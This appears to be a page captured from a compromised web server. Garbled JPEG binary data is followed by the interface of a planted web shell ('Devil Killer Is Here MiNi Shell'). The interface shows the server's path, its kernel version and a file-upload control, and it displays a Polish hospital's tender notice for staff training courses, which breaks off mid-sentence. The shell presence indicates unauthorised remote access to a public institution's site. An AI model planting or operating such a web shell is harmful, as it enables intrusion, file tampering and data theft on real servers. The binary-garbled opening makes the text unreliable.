JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231005/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231005/0043045101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wyłonienie Wykonawcy w zakresie przygotowania i przeprowadzenia pięciu obligatoryjnych szkoleń dla pracowników Onkologicznego Centrum Wsparcia Badań Klinicznych oraz innych pracowników DCOPiH. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Dolnośląskie Centrum Onkologii, Pulmonologii i Hematologii</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000290096</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Pl. Hirszfelda 12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">53-413</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL514 - Miasto Wrocław</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(71) 3689546</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">(71) 3689583</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dzp@dcopih.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://dcopih.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wyłonienie Wykonawcy w zakresie przygotowania i przeprowadzenia pięciu obligatoryjnych szkoleń dla pracowników Onkologicznego Centrum Wsparcia Badań Klinicznych oraz innych pracowników DCOPiH. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8d28ca7e-628f-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00430451</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-10-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://www.zamowienia.dco.com.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">http://www.zamowienia.dco.com.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy Zakupowej dostępnej pod adresem https://dcopih@ezamawiajacy.pl<br/>2.	Instrukcja dotycząca udziału w postępowaniu w tym złożenia oferty / wycofania oferty / oraz prowadzenia korespondencji z Zamawiającym dostępna jest pod adresem: https://oneplace.marketplanet.pl/regulamin<br/>3.	Wymagania techniczne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy użyciu Platformy Przetargowej dostępne są pod adresem: https://dcopih@ezamawiajacy.pl<br/>4.	We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem sprawy wskazanym w treści SWZ. <br/>5.	W razie problemów z przesłaniem korespondencji zwykłej (nie dotyczy ofert) poprzez Platformę Przetargową, Zamawiający dopuszcza komunikację elektroniczną pod adresem e-mail: dzp@dco.com.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i ust. 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE ogólne rozporzadzenie o ochronie danych - Dz.Urz. UE L 119 z 04.05.2016r.), zw. dalej RODO, informuję że: <br/>19.1.	Administratorem Pani/Pana danych osobowych jest Dolnoślaskie Centrum Onkologii, Pulmonologii i Hematologii, pl. Hirszfelda 12 zwany dalej Administratorem, dalej jako ADO.<br/>19.2. ADO zatrudnia Inspektora Ochrony Danych. Można się z nim kontaktować we wszystkich sprawach dotyczących przetwarzania danych osobowych oraz korzystania z praw związanych z przetwarzaniem danych:<br/>1)	osobiście w siedzibie ADO, <br/>2)	drogą listowną na adres: Dolnośląskie Centrum Onkologii, Pulmonologii i Hematologii, pl. Hirszfelda 12, <br/>53-413 Wrocław,<br/>3)	poprzez e-mail: iod@dco.com.pl.<br/>19.3.	Dane osobowe przetwarzane będą w związku z koniecznością wypełnienia obowiązku prawnego ciążącego na zamawiającym, w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego tj. zgodnie z art. 6 ust. 1 lit. c) rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE („RODO”) w zw. z ustawą z dnia 11 września 2019r. Prawo zamówień publicznych (Dz. U. 2019r., poz. 2019, z późn. zm.), zwaną („PZP”);<br/>19.4.	W razie realizacji zamówienia publicznego dane osobowe przetwarzane będą w celu wykonania umowy tj. zgodnie art. 6 ust. 1 lit b) RODO.<br/>19.5.	Odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania(komisja przetargowa) oraz odpowiednie organy kontrole w zakresie ich kompetencji; <br/>19.6.	Dane osobowe będą przechowywane, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. Dane te mogą być przechowywane przez okres dłuższy niż wskazany, o ile wynika to z ustawy z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach (t.j. Dz. U. z 2018r. poz. 217 z późn. zm.) i przepisów wykonawczych do tej ustawy.<br/>19.7. Obowiązek podania danych osobowych jest wymogiem ustawowym określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy PZP; <br/>1.	w odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany. <br/>2.	Prawa osób których dane są przetwarzane:<br/>•	prawo dostępu do danych osobowych;<br/>•	prawo do sprostowania danych osobowych (Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania)<br/>•	prawo żądania od administratora ograniczenia przetwarzania danych osobowych (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego); <br/>3.	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy;<br/>4.	nie przysługuje Pani/Panu:<br/>•	prawo do usunięcia danych osobowych;<br/>•	prawo do przenoszenia danych osobowych;<br/>•	prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych jest konieczność wypełnienia obowiązku prawnego ciążącego na zamawiającym lub wykonanie umowy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/TP/89/23/RB/TS</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Zasady GCP (20 godz.)<br/>Szczegółowy opis przedmiotu zamówienia stanowi: Załącznik Nr 1 – OPIS PRZEDMIOTU ZAMÓWIENIA (OPZ) oraz Załącznik nr 1a- FORMULARZ ASORTYMENTOWO-CENOWY </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-21</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">15.1.	Ocena ofert nieodrzuconych, złożonych przez Wykonawców niewykluczonych z postępowania zostanie dokonana wg niżej opisanych zasad.<br/>15.2.	Przy wyborze oferty najkorzystniejszej Zamawiający będzie się kierował następującymi kryteriami:<br/>1. Oferowana cena brutto - 60 %<br/> 2. Doświadczenie trenera – 40%<br/>15.3. Ocena ofert w zakresie przedstawionych wyżej kryteriów zostanie dokonana według następujących zasad<br/><br/>1.Oferowana cena brutto (60%): <br/>Oferta może uzyskać max. 60 pkt<br/>W - oznacza sumaryczną ilość punktów do dwóch miejsc po przecinku<br/>WCmin – najniższa cena ogółem brutto spośród prawidłowo złożonych i ważnych ofert<br/>WCb – cena ogółem brutto ocenianej oferty.<br/>Ocena ofert w zakresie przedstawionych wyżej kryteriów zostanie dokonana wg następujących zasad: <br/>W = 60*(WCmin/ WCb) <br/><br/> 2.Doświadczenie trenera – 40% (dla zadania nr 1-5)<br/> W przedmiotowym kryterium oceniana będzie liczba przeprowadzonych szkoleń o tematyce przedmiotu zamówienia w okresie trzech lat przed upływem terminu składania ofert. Ocenie będzie podlegać doświadczenie wyłącznie jednego trenera/wykładowcy, Wykonawca powinien wskazać trenera, który będzie podlegał ocenie.<br/> Maksymalna liczba punktów w ramach kryterium „Doświadczenie trenera” (Dt) wynosi 40. Przy ocenie oferty Zamawiający nie przyznaje ocen cząstkowych. Punkty za ww. kryterium będzie liczone w następujący sposób: <br/>1.	Za 5 przeprowadzonych szkoleń o tematyce przedmiotu zamówienia w ostatnich trzech latach zostanie przyznanych 0 punktów (w przypadku zaoferowania liczby szkoleń mniejszej niż 5 oferta zostanie odrzucona) <br/>2.	Za 6 przeprowadzonych szkoleń o tematyce przedmiotu zamówienia w ostatnich trzech latach zostanie przyznanych 20 punktów<br/>3.	Za 7 przeprowadzonych szkoleń o tematyce przedmiotu zamówienia w ostatnich trzech latach zostanie przyznanych 30 punktów<br/>4.	Za 8 przeprowadzonych szkoleń o tematyce przedmiotu zamówienia w ostatnich trzech latach zostanie przyznanych 40 punktów<br/><br/>Jako najkorzystniejszą zostanie uznana oferta, która uzyska największą liczbę punktów (W+Dt). Łączna liczba punktów możliwych do uzyskania wynosi 100. Przy ocenie oferty Zamawiający nie przyznaje ocen cząstkowych. Wynik zostanie zaokrąglony do 2 miejsc po przecinku. <br/><br/>15.4.	Zamawiający udzieli zamówienia wykonawcy, którego oferta:<br/>■	odpowiada zasadom określonym w ustawie <br/>■	odpowiada zasadom określonym w Specyfikacji Warunków Zamówienia <br/>■	uzyska najwyższą wartość oceny punktowej „W+Dt” zgodnie z punktem 15.2 i 15.3</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie trenera</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Regulacje krajowe i międzynarodowe badań klinicznych (5 godz.)<br/>Szczegółowy opis przedmiotu zamówienia stanowi: Załącznik Nr 1 – OPIS PRZEDMIOTU ZAMÓWIENIA (OPZ) oraz Załącznik nr 1a- FORMULARZ ASORTYMENTOWO-CENOWY </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-21</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">15.1.	Ocena ofert nieodrzuconych, złożonych przez Wykonawców niewykluczonych z postępowania zostanie dokonana wg niżej opisanych zasad.<br/>15.2.	Przy wyborze oferty najkorzystniejszej Zamawiający będzie się kierował następującymi kryteriami:<br/>1. Oferowana cena brutto - 60 %<br/> 2. Doświadczenie trenera – 40%<br/>15.3. Ocena ofert w zakresie przedstawionych wyżej kryteriów zostanie dokonana według następujących zasad<br/><br/>1.Oferowana cena brutto (60%): <br/>Oferta może uzyskać max. 60 pkt<br/>W - oznacza sumaryczną ilość punktów do dwóch miejsc po przecinku<br/>WCmin – najniższa cena ogółem brutto spośród prawidłowo złożonych i ważnych ofert<br/>WCb – cena ogółem brutto ocenianej oferty.<br/>Ocena ofert w zakresie przedstawionych wyżej kryteriów zostanie dokonana wg następujących zasad: <br/>W = 60*(WCmin/ WCb) <br/><br/> 2.Doświadczenie trenera – 40% (dla zadania nr 1-5)<br/> W przedmiotowym kryterium oceniana będzie liczba przeprowadzonych szkoleń o tematyce przedmiotu zamówienia w okresie trzech lat przed upływem terminu składania ofert. Ocenie będzie podlegać doświadczenie wyłącznie jednego trenera/wykładowcy, Wykonawca powinien wskazać trenera, który będzie podlegał ocenie.<br/> Maksymalna liczba punktów w ramach kryterium „Doświadczenie trenera” (Dt) wynosi 40. Przy ocenie oferty Zamawiający nie przyznaje ocen cząstkowych. Punkty za ww. kryterium będzie liczone w następujący sposób: <br/>1.	Za 5 przeprowadzonych szkoleń o tematyce przedmiotu zamówienia w ostatnich trzech latach zostanie przyznanych 0 punktów (w przypadku zaoferowania liczby szkoleń mniejszej niż 5 oferta zostanie odrzucona) <br/>2.	Za 6 przeprowadzonych szkoleń o tematyce przedmiotu zamówienia w ostatnich trzech latach zostanie przyznanych 20 punktów<br/>3.	Za 7 przeprowadzonych szkoleń o tematyce przedmiotu zamówienia w ostatnich trzech latach zostanie przyznanych 30 punktów<br/>4.	Za 8 przeprowadzonych szkoleń o tematyce przedmiotu zamówienia w ostatnich trzech latach zostanie przyznanych 40 punktów<br/><br/>Jako najkorzystniejszą zostanie uznana oferta, która uzyska największą liczbę punktów (W+Dt). Łączna liczba punktów możliwych do uzyskania wynosi 100. Przy ocenie oferty Zamawiający nie przyznaje ocen cząstkowych. Wynik zostanie zaokrąglony do 2 miejsc po przecinku. <br/><br/>15.4.	Zamawiający udzieli zamówienia wykonawcy, którego oferta:<br/>■	odpowiada zasadom określonym w ustawie <br/>■	odpowiada zasadom określonym w Specyfikacji Warunków Zamówienia <br/>■	uzyska najwyższą wartość oceny punktowej „W+Dt” zgodnie z punktem 15.2 i 15.3</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie trenera</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Standardowe procedury postępowania – SOP, systemy IT (10 godz.)<br/>Szczegółowy opis przedmiotu zamówienia stanowi: Załącznik Nr 1 – OPIS PRZEDMIOTU ZAMÓWIENIA (OPZ) oraz Załącznik nr 1a- FORMULARZ ASORTYMENTOWO-CENOWY </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-21</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">15.1.	Ocena ofert nieodrzuconych, złożonych przez Wykonawców niewykluczonych z postępowania zostanie dokonana wg niżej opisanych zasad.<br/>15.2.	Przy wyborze oferty najkorzystniejszej Zamawiający będzie się kierował następującymi kryteriami:<br/>1. Oferowana cena brutto - 60 %<br/> 2. Doświadczenie trenera – 40%<br/>15.3. Ocena ofert w zakresie przedstawionych wyżej kryteriów zostanie dokonana według następujących zasad<br/><br/>1.Oferowana cena brutto (60%): <br/>Oferta może uzyskać max. 60 pkt<br/>W - oznacza sumaryczną ilość punktów do dwóch miejsc po przecinku<br/>WCmin – najniższa cena ogółem brutto spośród prawidłowo złożonych i ważnych ofert<br/>WCb – cena ogółem brutto ocenianej oferty.<br/>Ocena ofert w zakresie przedstawionych wyżej kryteriów zostanie dokonana wg następujących zasad: <br/>W = 60*(WCmin/ WCb) <br/><br/> 2.Doświadczenie trenera – 40% (dla zadania nr 1-5)<br/> W przedmiotowym kryterium oceniana będzie liczba przeprowadzonych szkoleń o tematyce przedmiotu zamówienia w okresie trzech lat przed upływem terminu składania ofert. Ocenie będzie podlegać doświadczenie wyłącznie jednego trenera/wykładowcy, Wykonawca powinien wskazać trenera, który będzie podlegał ocenie.<br/> Maksymalna liczba punktów w ramach kryterium „Doświadczenie trenera” (Dt) wynosi 40. Przy ocenie oferty Zamawiający nie przyznaje ocen cząstkowych. Punkty za ww. kryterium będzie liczone w następujący sposób: <br/>1.	Za 5 przeprowadzonych szkoleń o tematyce przedmiotu zamówienia w ostatnich trzech latach zostanie przyznanych 0 punktów 